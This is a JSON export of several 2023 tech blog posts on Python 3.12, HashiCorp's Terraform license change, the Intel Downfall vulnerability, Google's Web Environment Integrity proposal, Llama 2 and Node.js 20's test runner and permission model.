GIL: The Beginning of the End # The biggest technical story in Python 3.12 isn\u0026rsquo;t a user-facing feature — it\u0026rsquo;s PEP 684, which introduces per-interpreter GIL support. For those who haven\u0026rsquo;t followed the saga, the Global Interpreter Lock (GIL) has been Python\u0026rsquo;s most famous limitation for decades. 
It prevents true parallel execution of Python bytecode across threads, which is why CPU-bound Python programs don\u0026rsquo;t scale across cores.\nPEP 684 doesn\u0026rsquo;t remove the GIL. What it does is allow each sub-interpreter to have its own GIL, meaning multiple interpreters running in the same process can execute Python code truly in parallel. This is the foundation for PEP 554 (multiple interpreters in the stdlib), which isn\u0026rsquo;t in 3.12 but is coming.\nThe practical impact for 3.12 is limited — the C API for per-interpreter GIL exists, but the Python-level interface isn\u0026rsquo;t ready yet. Think of this as laying the plumbing. But the direction is clear: Python is systematically addressing its concurrency limitations without breaking backward compatibility. Combined with Sam Gross\u0026rsquo;s PEP 703 for an optional GIL-free build (which the steering council is evaluating), the Python concurrency story is about to change significantly.\nImproved Error Messages Continue # Python 3.10 introduced better error messages, and 3.11 expanded on them. Python 3.12 pushes even further. The improvements are targeted and practical:\nModules that shadow standard library modules now get helpful suggestions when imports fail. If you\u0026rsquo;ve got a file called random.py in your project and import random breaks, Python now tells you why\nNameError suggestions now cover more cases, including suggesting self.x when you forget self in method bodies\nImportError messages for from module import name now suggest similar names from the module\nThese seem small, but they compound. I work with teams where junior developers lose significant time to cryptic error messages. Every improvement here reduces friction. 
I\u0026rsquo;ve seen the shadow module issue alone cost new Python developers hours of confusion — having the interpreter just tell you what\u0026rsquo;s wrong is a meaningful quality-of-life improvement.\nType System Enhancements # Python\u0026rsquo;s gradual typing story continues to evolve. 3.12 introduces PEP 695, which provides new syntax for type parameter declarations:\n# Old way\nfrom typing import TypeVar\nT = TypeVar(\u0026#39;T\u0026#39;)\ndef first(lst: list[T]) -\u0026gt; T:\n    return lst[0]\n# New 3.12 way\ndef first[T](lst: list[T]) -\u0026gt; T:\n    return lst[0]\nThe new syntax is cleaner and more intuitive, especially for developers coming from TypeScript or Rust where generic syntax is similar. Type aliases also get a dedicated keyword:\ntype Vector = list[float]\ntype Matrix[T] = list[list[T]]\nFor teams that have adopted type hints — and you should — this reduces boilerplate and makes generic code more readable. The typing module has been accumulating syntax debt as it evolved from a third-party library to a core language feature, and PEP 695 is a significant step toward cleaning that up.\nPerformance: The Specializing Interpreter Matures # Python 3.11 introduced the specializing adaptive interpreter, which optimizes frequently-executed bytecode instructions based on the types they encounter. Python 3.12 builds on this with additional specialization opportunities and better comprehension performance.\nComprehensions now use inline bytecode rather than creating a hidden nested function, which reduces overhead for list, dict, and set comprehensions. This is a common Python pattern, and making it faster benefits virtually every Python codebase.\nThe overall performance improvement over 3.11 is more modest than the dramatic 3.10→3.11 jump (which was 10-60% faster). But the cumulative effect of 3.10→3.11→3.12 is substantial. 
If you\u0026rsquo;re still on 3.9 or 3.10, upgrading to 3.12 should deliver measurable speedups for most workloads.\nRemoved Features and Breaking Changes # Python 3.12 removes several deprecated features that have been on notice for years. The biggest ones:\ndistutils is gone: Fully removed after being deprecated since 3.10. If you haven\u0026rsquo;t migrated your build tooling to setuptools or another build backend, this is your forcing function\nOld typing aliases: Several deprecated typing constructs are removed\nasynchat, asyncore, and imp: Long-deprecated modules finally disappear\nThe distutils removal will break some older packages and build scripts. If you maintain internal packages, test your builds against 3.12rc1 now rather than discovering issues after the October release.\nMy Take # Python\u0026rsquo;s trajectory under its current development model is steady and positive. The language isn\u0026rsquo;t making dramatic leaps — it\u0026rsquo;s systematically addressing known pain points while maintaining backward compatibility. That\u0026rsquo;s exactly what a mature language with Python\u0026rsquo;s install base should be doing.\nThe per-interpreter GIL work is the most strategically important change, even though its practical impact in 3.12 is minimal. It signals that the core team is serious about making Python a viable choice for CPU-parallel workloads — something that\u0026rsquo;s been a perennial complaint and a common reason teams reach for Go or Rust.\nFor production teams, I\u0026rsquo;d recommend testing against the RC now and planning a 3.12 upgrade for Q1 2024 (after the initial patch releases stabilize). The combination of performance improvements, better error messages, and cleaner type syntax makes it a worthwhile upgrade for any Python shop.\nThe language keeps getting better in the ways that matter. 
That\u0026rsquo;s worth celebrating.\n","date":"17 August 2023","externalUrl":null,"permalink":"/posts/230817-python-312-release-candidate/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.12’s first release candidate arrives with major performance improvements, better error messages, and the groundwork for removing the GIL.","title":"Python 3.12 RC1 Drops — What Developers Should Know","type":"posts"},{"content":"HashiCorp announced today that they\u0026rsquo;re relicensing all their products — Terraform, Vault, Consul, Nomad, Packer, Vagrant, Waypoint, and Boundary — from the Mozilla Public License 2.0 (MPL 2.0) to the Business Source License (BSL 1.1). The change takes effect immediately for new releases. If you use any of these tools, and if you\u0026rsquo;re doing DevOps in 2023 you almost certainly use at least Terraform, this affects you. This continues a troubling pattern in infrastructure software.\nThe infrastructure-as-code community is reacting with a mix of anger, resignation, and frantic evaluation of alternatives. Let me walk through what\u0026rsquo;s actually changing and what it means.\nWhat the BSL Actually Means # The Business Source License, originally created by MariaDB, is not an open-source license. The Open Source Initiative (OSI) does not recognize it as such, and it doesn\u0026rsquo;t meet the Open Source Definition. Under BSL 1.1, you can view, modify, and redistribute the source code, but you cannot use it for \u0026ldquo;production\u0026rdquo; purposes that compete with HashiCorp\u0026rsquo;s commercial offerings.\nThe specific restriction in HashiCorp\u0026rsquo;s BSL is: you cannot provide a competing commercial product or service that uses the covered code. After four years, the code converts to MPL 2.0 — so today\u0026rsquo;s Terraform release will become genuinely open source in 2027. But the current, actively maintained version? 
That\u0026rsquo;s BSL.\nFor most end users who deploy their own infrastructure using Terraform, nothing changes in practice. You can still use Terraform to manage your AWS, Azure, or Google Cloud resources. The restriction targets companies that offer Terraform-as-a-service or embed Terraform functionality in competing infrastructure management platforms.\nWho This Actually Affects # The obvious targets are companies that compete with HashiCorp Cloud Platform (HCP): Terraform Cloud competitors like Spacelift, env0, and Scalr. Managed service providers who offer Terraform-based infrastructure management are also in the crosshairs. These companies have built businesses on top of HashiCorp\u0026rsquo;s open-source tools, and the BSL specifically targets their use case.\nBut the restriction\u0026rsquo;s boundaries are ambiguous enough to create uncertainty for a much wider set of users. If your company uses Terraform internally but also sells infrastructure services, does that count as \u0026ldquo;competitive\u0026rdquo;? If you\u0026rsquo;ve built internal tooling around Terraform that you want to productize, are you in violation? HashiCorp has published an FAQ attempting to clarify these boundaries, but licensing ambiguity is itself a risk.\nFor platform teams inside enterprises, the practical impact may be minimal today. But the precedent it sets — and the possibility of future restriction changes — introduces a new category of risk into your infrastructure tooling decisions.\nThe Open Source Trust Deficit # HashiCorp\u0026rsquo;s decision follows a pattern we\u0026rsquo;ve seen repeatedly: MongoDB (SSPL), Elasticsearch (SSPL/Elastic License), Redis (Commons Clause, then RSAL), Confluent (Community License), and now HashiCorp (BSL). 
Each company follows the same playbook: build an open-source project, attract contributions and adoption, build a business around managed services, then change the license when AWS or other cloud providers start offering competing managed services.\nI understand the business logic. Cloud providers genuinely do free-ride on open-source projects, offering managed versions without contributing proportionally back. HashiCorp\u0026rsquo;s annual revenue is around $500 million, but their market cap has been declining, and the pressure to protect their Terraform Cloud business is real.\nBut each license change erodes trust in the \u0026ldquo;open-source to commercial\u0026rdquo; model. Companies evaluating infrastructure tooling now have to factor in license change risk. \u0026ldquo;It\u0026rsquo;s open source\u0026rdquo; used to mean something about long-term availability and control. Now it comes with an asterisk: \u0026ldquo;until the company decides it\u0026rsquo;s not.\u0026rdquo;\nThe Technical Implications # From a technical standpoint, the last MPL-licensed version of Terraform (1.5.x) remains available and can be forked. The Terraform provider ecosystem — all those AWS, Azure, GCP, and community providers — are separate projects with their own licenses, and they remain open source.\nThis means a community fork is technically feasible. The question is whether anyone has the resources and motivation to maintain a fork of something as complex as Terraform\u0026rsquo;s core. Early conversations are already happening in the community about exactly this possibility. The providers can be shared between the original and any fork, which lowers the barrier significantly.\nFor teams currently using Terraform, my immediate recommendation is: don\u0026rsquo;t panic, but start planning. 
Pin your Terraform version, evaluate your actual exposure to the BSL restrictions, and begin assessing alternatives like Pulumi, CDK for Terraform, or even CloudFormation/ARM/Deployment Manager if you\u0026rsquo;re single-cloud. None of these are drop-in replacements, but understanding your options now is better than scrambling later.\nThe Broader DevOps Tool Landscape # This move has implications beyond Terraform. HashiCorp\u0026rsquo;s entire portfolio is affected. Vault is widely used for secrets management. Consul for service discovery. Packer for image building. If you\u0026rsquo;ve built your infrastructure platform on the HashiCorp stack — and many organizations have — you\u0026rsquo;re now dependent on BSL-licensed software across multiple critical components. The community response will parallel what we saw with Redis and other open source licensing shifts.\nThe good news is that the DevOps tool landscape has matured significantly. For almost every HashiCorp product, credible alternatives exist. The bad news is that migration is expensive, especially for deeply integrated tools like Vault where the switching costs include re-encrypting secrets, updating every application\u0026rsquo;s secrets retrieval logic, and retraining operations teams.\nMy Take # I\u0026rsquo;ve used Terraform since the 0.x days. I\u0026rsquo;ve written providers, built modules, and advocated for infrastructure as code in organizations that were skeptical. This license change doesn\u0026rsquo;t erase any of that value, but it does change the relationship.\nThe BSL isn\u0026rsquo;t the end of the world for most users. But it is a signal. It tells us that \u0026ldquo;open source\u0026rdquo; in the VC-backed infrastructure space is a growth strategy, not a commitment. 
And it means that our technology choices need to account for licensing risk alongside technical merit.\nIf you\u0026rsquo;re starting a new project today, I\u0026rsquo;d look hard at the alternatives before defaulting to Terraform. If you\u0026rsquo;re already invested, keep using it — but start treating your Terraform investment the way you\u0026rsquo;d treat any proprietary vendor dependency: with clear exit criteria and a migration plan on the shelf.\nThe open-source model isn\u0026rsquo;t broken, but the \u0026ldquo;open-source-until-IPO\u0026rdquo; model clearly is.\n","date":"10 August 2023","externalUrl":null,"permalink":"/posts/230810-hashicorp-terraform-bsl-license/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"HashiCorp’s decision to relicense Terraform and other products under the Business Source License has sent shockwaves through the infrastructure community.","title":"HashiCorp Switches Terraform to BSL — The Open Source World Reacts","type":"posts"},{"content":"Just when you thought we\u0026rsquo;d moved past the era of headline-grabbing CPU vulnerabilities, a new one arrives to remind us that the speculative execution attack surface is far from exhausted. Security researcher Daniel Moghimi has disclosed Downfall (CVE-2022-40982), a vulnerability affecting Intel processors from the 6th through 11th generations — essentially every Intel CPU shipped between 2015 and 2021. If you\u0026rsquo;re running workloads on Intel hardware in the cloud or on-premises, this one needs your attention.\nWhat Downfall Actually Exploits # Downfall exploits a flaw in the Gather instruction, which is used to access scattered data in memory. 
The vulnerability allows an attacker to steal data from other processes, virtual machines, or even SGX (Software Guard Extensions) enclaves running on the same physical core.\nThe technical mechanism is a variant of the transient execution attacks we\u0026rsquo;ve been dealing with since Spectre and Meltdown hit in 2018. During speculative execution, the Gather instruction can leak the contents of internal vector register files. Moghimi\u0026rsquo;s proof-of-concept demonstrates stealing AES-128 and AES-256 cryptographic keys from other processes, as well as arbitrary data from the Linux kernel.\nWhat makes Downfall particularly concerning is the reliability and speed of the attack. Unlike some speculative execution vulnerabilities that require precise timing and produce noisy results, Moghimi reports being able to extract data at rates of up to 8 bytes per second with high reliability. That\u0026rsquo;s fast enough to steal cryptographic keys in seconds.\nThe Affected Hardware Landscape # The vulnerability impacts Intel Core processors from Skylake (6th gen) through Tiger Lake (11th gen), as well as corresponding Xeon server processors. This is an enormous install base. Every major cloud provider — AWS, Azure, Google Cloud — runs significant amounts of affected Intel hardware.\nImportantly, 12th gen Alder Lake and newer processors are not affected, as Intel changed the microarchitecture in ways that don\u0026rsquo;t exhibit this behavior. But the long tail of 6th-through-11th-gen processors in production environments means this vulnerability will be relevant for years.\nIntel has released microcode updates that mitigate the vulnerability, and these are being distributed through operating system and firmware updates. The mitigation works by disabling the optimization in the Gather instruction that enables the leak.\nThe Performance Tax # Here\u0026rsquo;s where it gets painful for operations teams: the microcode mitigation has a measurable performance impact. 
Intel\u0026rsquo;s own documentation acknowledges potential performance degradation, and early benchmarks suggest the impact varies significantly by workload.\nWorkloads that heavily use AVX2/AVX-512 Gather instructions — which includes many HPC, scientific computing, database, and machine learning workloads — can see performance drops of 30-50% on the affected code paths. General-purpose workloads see much smaller impacts, typically in the single-digit percentages.\nThis creates an uncomfortable decision for infrastructure teams. Do you apply the mitigation and accept the performance hit, or do you assess your threat model and potentially leave the vulnerability unpatched? For multi-tenant environments like cloud platforms, there\u0026rsquo;s no real choice — the providers will patch. But for dedicated infrastructure running trusted workloads, the calculus is different.\nI\u0026rsquo;ve been through this exact decision process with Spectre and Meltdown mitigations, and my advice is the same: patch first, benchmark second, and only consider disabling mitigations if you have a strong threat model justification and compensating controls. The performance impact on most real-world workloads is lower than the synthetic benchmarks suggest.\nCloud Provider Response # The major cloud providers have been coordinating with Intel on this disclosure and are rolling out microcode updates across their fleets. AWS has already begun patching affected instances, and Azure and Google Cloud are following similar timelines.\nFor cloud users, the key question is whether you need to take any action beyond what the provider handles. If you\u0026rsquo;re running VMs, the host-level microcode update protects you from cross-VM attacks. 
But if you\u0026rsquo;re running untrusted code within a VM — think serverless functions, container orchestration with shared nodes, or CI/CD runners — you may want to evaluate whether kernel-level mitigations are also needed.\nThe SGX implications are worth special attention for anyone using confidential computing. Downfall\u0026rsquo;s ability to extract data from SGX enclaves undermines one of the core promises of Intel\u0026rsquo;s trusted execution environment. If your security model depends on SGX protecting secrets from a compromised host OS, you need to ensure the microcode update is applied.\nThe Bigger Pattern # Downfall is the latest in a long line of speculative execution vulnerabilities: Spectre, Meltdown, Foreshadow, MDS, RIDL, ZombieLoad, and now this. Each one exploits a different aspect of speculative execution, but they all stem from the same fundamental tension: modern CPUs optimize for performance by speculatively executing instructions, and those speculative operations can leave observable traces that leak information. This pattern of supply chain and infrastructure vulnerabilities echoes broader security challenges where foundational components become critical risk points.\nThe uncomfortable truth is that this class of vulnerability is architectural. As long as CPUs speculatively access data, there will be opportunities for side-channel attacks. Intel, AMD, and ARM have all been affected by various members of this family, though Intel\u0026rsquo;s aggressive speculation has made it the most frequent target.\nMy Take # Five years after Spectre and Meltdown, I\u0026rsquo;d hoped we were past the \u0026ldquo;new speculative execution CVE every quarter\u0026rdquo; phase. Downfall shows we\u0026rsquo;re not. 
The affected hardware generation (Skylake through Tiger Lake) represents the bulk of Intel\u0026rsquo;s installed base, and these processors will be in production for years to come.\nFor those of us managing infrastructure, the lesson is familiar but worth repeating: treat CPU vulnerabilities as part of your ongoing security maintenance, not as one-time emergencies. Have a process for evaluating microcode updates, benchmark your actual workloads against mitigations, and keep your threat models current. The importance of systematic supply chain security extends to the foundational hardware components we depend on.\nThe silver lining, if there is one, is that newer Intel architectures appear to be better designed against this class of attack. The forced march toward hardware refresh just got another justification — though try explaining that to the budget committee.\n","date":"3 August 2023","externalUrl":null,"permalink":"/posts/230803-intel-downfall-cpu-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A new Intel CPU vulnerability called Downfall exposes sensitive data through speculative execution, and the performance impact of mitigations is significant.","title":"Intel's Downfall Vulnerability — Another Speculative Execution Headache","type":"posts"},{"content":"A Google engineer\u0026rsquo;s proposal for a \u0026ldquo;Web Environment Integrity\u0026rdquo; API has exploded across developer communities this week, and the reaction has been overwhelmingly negative. The proposal, which aims to let websites verify that the client environment hasn\u0026rsquo;t been tampered with, sounds reasonable on the surface. Dig into the implications, though, and you start to see why developers are calling this \u0026ldquo;DRM for the web browser.\u0026rdquo;\nHaving watched the browser wars play out over decades, I can tell you this has a familiar smell. 
Let me break down what\u0026rsquo;s actually being proposed and why it matters.\nWhat the Proposal Actually Says # The Web Environment Integrity API would allow a website to request an \u0026ldquo;environment integrity attestation\u0026rdquo; from the browser. Think of it like a signed certificate that says: \u0026ldquo;This request is coming from an unmodified version of Chrome running on a genuine operating system.\u0026rdquo; The attestation would be provided by a third-party \u0026ldquo;attester\u0026rdquo; — which in practice would likely be Google, Apple, or Microsoft.\nThe stated goals are legitimate: combating ad fraud, preventing bot activity, ensuring game fairness, and protecting content creators. These are real problems. Anyone who\u0026rsquo;s dealt with sophisticated scraping operations or click fraud knows the challenge.\nThe technical mechanism borrows heavily from mobile app attestation — Android\u0026rsquo;s SafetyNet (now Play Integrity) and Apple\u0026rsquo;s App Attest already do similar things for native apps. The proposal essentially extends this model to the web.\nWhy Developers Are Alarmed # The fundamental problem is that this mechanism allows websites to discriminate based on the client software. If a site requires a passing attestation, it can effectively block:\nAlternative browsers: Firefox, Brave, or any browser that doesn\u0026rsquo;t implement attestation or isn\u0026rsquo;t approved by the attester Modified browsers: Any browser with extensions or modifications that the attester considers \u0026ldquo;tampering\u0026rdquo; Ad blockers: Extensions that modify page content could potentially trigger attestation failure Accessibility tools: Screen readers and other assistive technology that injects into pages Linux users: If attestation requires hardware-backed security modules, Linux desktop users could be excluded This isn\u0026rsquo;t hypothetical fear-mongering. 
We\u0026rsquo;ve already seen this pattern with Android\u0026rsquo;s SafetyNet, where banking apps refuse to run on rooted devices or custom ROMs, even when those modifications have nothing to do with security. The attestation model inherently favors locked-down, vendor-controlled environments.\nThe Monopoly Concern # Here\u0026rsquo;s what makes this particularly concerning: Google controls Chrome (65%+ market share), Chromium (the engine behind Edge, Brave, Opera, and others), and the dominant mobile operating system. If Web Environment Integrity becomes a de facto standard that major sites require, Google effectively becomes the gatekeeper of the web.\nThe proposal acknowledges that attestation should be \u0026ldquo;freely available\u0026rdquo; and that there should be multiple attesters. But the economics and technical requirements of running an attestation service at scale naturally favor incumbents. It\u0026rsquo;s hard to imagine a truly independent attestation ecosystem when the browser vendor, the OS vendor, and the attester are all the same company.\nWe\u0026rsquo;ve seen this centralization play out before with proprietary standards and approaches to open ecosystems. When major platforms change their governance or restrictions, the impact on the broader ecosystem can be severe, highlighting why open standards and multi-vendor support are critical.\nThe Technical Architecture Problem # Even setting aside the political concerns, the technical design raises questions. Attestation introduces a new point of failure and latency in every web request that requires it. The attester becomes critical infrastructure — if it goes down, attested sites become inaccessible. 
And the privacy implications of a central service that knows which sites you\u0026rsquo;re visiting (because it\u0026rsquo;s providing attestations for those requests) are significant, despite the proposal\u0026rsquo;s claims about privacy preservation.\nFrom an engineering perspective, I\u0026rsquo;m also skeptical about the attestation\u0026rsquo;s durability. The history of DRM and client-side attestation is a history of bypasses. Sophisticated attackers will find ways to fake attestations, while legitimate users with unusual setups get blocked. This is the same dynamic we see with every client-side trust mechanism.\nThe W3C Factor # The proposal was originally floated through the WICG (Web Incubator Community Group), which is a precursor to formal W3C standardization. It\u0026rsquo;s worth noting that other browser vendors — Mozilla and Apple in particular — have not expressed support. Mozilla has historically opposed similar proposals, and their position on this one seems likely to follow suit.\nThe web standards process exists specifically to prevent a single vendor from unilaterally changing the web platform. If this proposal doesn\u0026rsquo;t get multi-vendor support, it could still be implemented as a Chrome-only feature — but that would make the monopoly concerns even more acute. The principle of open governance and community stewardship matters as much in web standards as it does in broader open source projects.\nMy Take # I\u0026rsquo;ve spent enough years building for the web to have strong opinions about what makes it valuable. The web\u0026rsquo;s power has always been its openness — any client can access any server, the source is viewable, and no single entity controls the platform. 
Web Environment Integrity doesn\u0026rsquo;t just chip away at that openness; it fundamentally inverts the trust model.\nInstead of servers earning trust by proving their identity (via TLS certificates), clients would now need to prove their \u0026ldquo;integrity\u0026rdquo; to servers. That\u0026rsquo;s a profound shift, and it\u0026rsquo;s one that benefits platform owners at the expense of users and independent developers.\nThe stated problems — bots, fraud, cheating — are real. But the solution shouldn\u0026rsquo;t be to hand control of the web\u0026rsquo;s client environment to a handful of attestation providers. We should be solving these problems at the application layer, with techniques like behavioral analysis, rate limiting, and server-side validation.\nI\u0026rsquo;m watching the community response to this with cautious optimism. The backlash has been swift and technically articulate. Whether it\u0026rsquo;s enough to stop a determined Google from pushing forward remains to be seen.\n","date":"27 July 2023","externalUrl":null,"permalink":"/posts/230727-google-web-environment-integrity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s Web Environment Integrity API proposal has the web development community up in arms, and the concerns are well-founded.","title":"Google's Web Environment Integrity Proposal — DRM for the Web?","type":"posts"},{"content":"Yesterday Meta dropped what might be the most significant open-source AI release of the year: Llama 2, a family of large language models available for both research and commercial use. After the original Llama leaked earlier this year and spread across the open-source community like wildfire, Meta has now decided to lean into the openness rather than fight it. 
It\u0026rsquo;s a bold move, and one that could reshape how we think about AI development for years to come.\nWhat Llama 2 Actually Brings to the Table # The release includes pretrained and fine-tuned models at three scales: 7B, 13B, and 70B parameters. The fine-tuned variants, dubbed Llama 2-Chat, have been optimized for dialogue use cases using reinforcement learning from human feedback (RLHF) — the same technique that powers ChatGPT\u0026rsquo;s conversational abilities.\nWhat makes this technically interesting isn\u0026rsquo;t just the model sizes. Meta published a detailed research paper walking through their training methodology, including their approach to safety tuning. The 70B parameter chat model reportedly performs competitively with ChatGPT on many benchmarks, though the exact comparisons vary depending on the task.\nThe training data cutoff and context window (4096 tokens) are limitations worth noting. You\u0026rsquo;re not getting GPT-4 capability here. But you are getting a model you can download, run locally, fine-tune on your own data, and deploy without per-token API costs. For many production use cases, that trade-off is more than acceptable.\nThe Licensing Sweet Spot # Meta partnered with Microsoft on this release, making the models available through Azure and directly via download. The license is interesting — it\u0026rsquo;s not a traditional open-source license like Apache 2.0. Instead, it\u0026rsquo;s a custom community license that allows commercial use, but with a notable restriction: if your product or service has more than 700 million monthly active users, you need a special license from Meta.\nThat threshold effectively means any startup, mid-size company, or even most enterprises can use Llama 2 freely. It only gates the handful of companies that could genuinely compete with Meta at scale. 
It\u0026rsquo;s clever positioning — open enough to build an ecosystem, restricted enough to prevent direct competitors from free-riding.\nFrom a practical standpoint, for the developers I work with building internal tools, customer-facing applications, and data pipelines, this license is perfectly fine. We can fine-tune on domain-specific data, deploy on our own infrastructure, and maintain complete control over the model behavior. That\u0026rsquo;s been the missing piece for many AI integration projects.\nRunning It Yourself # The community has already started optimizing Llama 2 for consumer hardware. Projects like llama.cpp have been updated to support the new models, enabling quantized versions to run on machines with modest GPU (or even CPU-only) setups.\nI\u0026rsquo;ve been testing the 13B chat variant on a workstation with an RTX 3090, and the results are genuinely impressive for local inference. Response quality for code generation and technical Q\u0026amp;A is solid — not GPT-4 level, but easily good enough for many practical tasks. The 7B model can even run comfortably on a MacBook Pro with Apple Silicon using the GGML format.\nFor teams evaluating whether to build on OpenAI\u0026rsquo;s API versus running their own inference, this changes the math considerably. Later developments like Meta\u0026rsquo;s Llama 3.1 release would further validate this approach. The upfront investment in infrastructure and fine-tuning expertise is real, but the operational costs and data privacy benefits can be substantial. I\u0026rsquo;ve seen too many projects hit walls when they realize their entire AI pipeline depends on a third-party API with rate limits, changing pricing, and no guarantee of model consistency.\nWhat This Means for the AI Ecosystem # Meta\u0026rsquo;s strategy here seems clear: commoditize the complement. 
By making strong foundation models freely available, they increase the value of their own infrastructure, data, and research capabilities while making it harder for competitors to charge premium prices for API access alone.\nFor the broader ecosystem, this is unambiguously positive. More accessible models mean more experimentation, more fine-tuned variants for specific domains, and faster iteration on techniques like retrieval-augmented generation with modern LLMs and tool use. The research community gets reproducible baselines. Small companies get capable models they can actually afford to deploy.\nMy Take # I\u0026rsquo;ve been building software for three decades, and I\u0026rsquo;ve seen plenty of \u0026ldquo;everything changes\u0026rdquo; moments that turned out to be incremental. But the trajectory of open AI models this year — from the Llama leak in March, through the explosion of fine-tuned variants, to this official commercial release — feels genuinely different.\nThe gap between proprietary and open models is closing faster than most people expected. Six months ago, running a competent LLM locally was a novelty. Now it\u0026rsquo;s becoming a legitimate architectural choice for production systems. The ecosystem continued to mature with new models emerging regularly. Meta releasing Llama 2 with commercial terms doesn\u0026rsquo;t just validate the open approach — it accelerates it.\nIf you\u0026rsquo;re a developer or engineering leader evaluating AI integration, now is the time to start experimenting with self-hosted models. 
The tooling is maturing rapidly, and having the option to move between API-based and self-hosted inference gives you strategic flexibility that will only become more valuable as this space evolves.\nThe AI landscape just got a lot more interesting for those of us who prefer to own our infrastructure.\n","date":"20 July 2023","externalUrl":null,"permalink":"/posts/230720-meta-llama2-open-source-llm/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Meta’s release of Llama 2 as a commercially-licensed open model changes the game for developers building with large language models.","title":"Meta Releases Llama 2 — Open Source AI Gets a Massive Boost","type":"posts"},{"content":"Node.js 20 shipped in April and is scheduled to move to LTS in October, and after a few months of running it in development environments, I\u0026rsquo;m increasingly convinced this is one of the most significant Node releases in years. Not because of any single headline feature, but because two additions — the stable test runner and the experimental permission model — signal a fundamental shift in how the Node.js project thinks about the runtime\u0026rsquo;s role.\nFor a platform that famously relied on the ecosystem for almost everything, Node.js building these capabilities into the core is a statement. And having used both extensively, I think they got it right.\nThe Built-in Test Runner Grows Up # Node\u0026rsquo;s test runner module (node:test) was introduced as experimental in Node 18. In Node 20, it\u0026rsquo;s been promoted to stable, and the improvements since its initial release are substantial.\nIf you\u0026rsquo;ve been writing Node.js for any length of time, you\u0026rsquo;ve had the \u0026ldquo;which test framework\u0026rdquo; conversation. Jest, Mocha, Vitest, AVA, tap — the ecosystem is rich but fragmented. 
Every project makes a different choice, every team has preferences, and switching between projects means context-switching between test APIs.\nThe built-in test runner doesn\u0026rsquo;t try to replace these frameworks entirely, but it provides a solid foundation that requires zero dependencies:\nimport { describe, it } from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert\u0026#39;; describe(\u0026#39;user service\u0026#39;, () =\u0026gt; { it(\u0026#39;should create a user with valid input\u0026#39;, async () =\u0026gt; { const user = await createUser({ name: \u0026#39;Test\u0026#39;, email: \u0026#39;test@example.com\u0026#39; }); assert.strictEqual(user.name, \u0026#39;Test\u0026#39;); assert.ok(user.id); }); it(\u0026#39;should reject invalid email\u0026#39;, async () =\u0026gt; { await assert.rejects( () =\u0026gt; createUser({ name: \u0026#39;Test\u0026#39;, email: \u0026#39;invalid\u0026#39; }), { code: \u0026#39;VALIDATION_ERROR\u0026#39; } ); }); }); The API will feel familiar to anyone who\u0026rsquo;s used Mocha or node-tap. But the details matter:\nSubtests and nesting work naturally with describe and it blocks. Concurrent test execution is supported out of the box — tests within a describe block can run in parallel with the { concurrency: true } option. Test hooks (before, after, beforeEach, afterEach) work as expected. Mocking is built in via node:test\u0026rsquo;s mock object, which covers functions and methods and, as of Node 20.4, timers. Module mocking is not included in Node 20.\nThe mock capabilities are particularly welcome. Previously, mocking in Node tests meant pulling in sinon, proxyquire, jest.mock(), or similar. Having function and timer mocks built into the runtime means fewer dependencies and fewer compatibility issues.\nI\u0026rsquo;ve been migrating a medium-sized internal API project from Jest to node:test over the past month. The test suite — about 300 tests — moved over with surprisingly little friction. 
The main gaps I\u0026rsquo;ve hit are snapshot testing (not yet supported) and the rich matcher library Jest provides. For the matchers, node:assert is more verbose but perfectly functional. For snapshots, I\u0026rsquo;m holding off on those test files for now.\nThe Permission Model: Defense in Depth for Node # The more quietly revolutionary feature in Node 20 is the experimental permission model. Enabled with the --experimental-permission flag, it lets you restrict what a Node.js process can do:\nnode --experimental-permission --allow-fs-read=/app/config --allow-fs-write=/app/logs app.js This restricts the process to reading only from /app/config and writing only to /app/logs. Any attempt to access other paths, spawn child processes, or use worker threads throws an ERR_ACCESS_DENIED error.\nThe available permission flags include:\n--allow-fs-read and --allow-fs-write for filesystem access --allow-child-process for spawning processes --allow-worker for worker threads If you\u0026rsquo;re thinking \u0026ldquo;this sounds like Deno\u0026rsquo;s permission model,\u0026rdquo; you\u0026rsquo;re right. Deno pioneered this approach with its secure-by-default philosophy, requiring explicit permissions for file access, network access, and environment variables. Node is following suit, though the implementation differs.\nWhy does this matter? Because the Node.js ecosystem\u0026rsquo;s biggest security liability has always been its dependency chain. A typical Node project pulls in hundreds or thousands of transitive dependencies. Any one of them could contain malicious code that reads your filesystem, exfiltrates environment variables, or spawns processes.\nThe permission model doesn\u0026rsquo;t eliminate this risk — a compromised dependency within the allowed paths can still cause damage — but it significantly reduces the blast radius. 
If your application only needs to read from its config directory and write to its log directory, the permission model ensures that a compromised dependency running inside your application can\u0026rsquo;t read your SSH keys or write to arbitrary system paths. It does nothing for install-time code such as postinstall scripts, which run under npm rather than under your restricted process.\nPractical Implications for Production # For production deployments, combining the permission model with container security creates a robust defense-in-depth strategy:\nContainer-level restrictions (read-only filesystem, dropped capabilities, non-root user) Node permission model (restrict file access to specific paths, disable child process spawning) Application-level validation (input sanitization, output encoding) Each layer catches different classes of attacks. The Node permission model is particularly valuable for catching supply chain attacks that container security alone would miss: a dependency that tries to spawn a shell or read a credentials file elsewhere inside the container is denied at runtime. Environment variables are not covered yet, so a dependency reading process.env to exfiltrate secrets would still get through in the current implementation.\nI\u0026rsquo;ve been running a staging environment with permissions enabled for the past six weeks. The initial setup required mapping out exactly which filesystem paths the application needs — which, honestly, is an exercise every team should do regardless. We discovered three dependencies that were writing temp files to unexpected locations and one that was reading /etc/hosts for no apparent reason. The permission model forced a security audit we should have done ages ago.\nThe Broader Trend # Node 20 reflects a maturing ecosystem. The built-in test runner reduces dependency on external tooling for a fundamental development activity. The permission model acknowledges that security can\u0026rsquo;t be an afterthought in a runtime that powers millions of production applications.\nBoth features also show Node.js learning from its competition. 
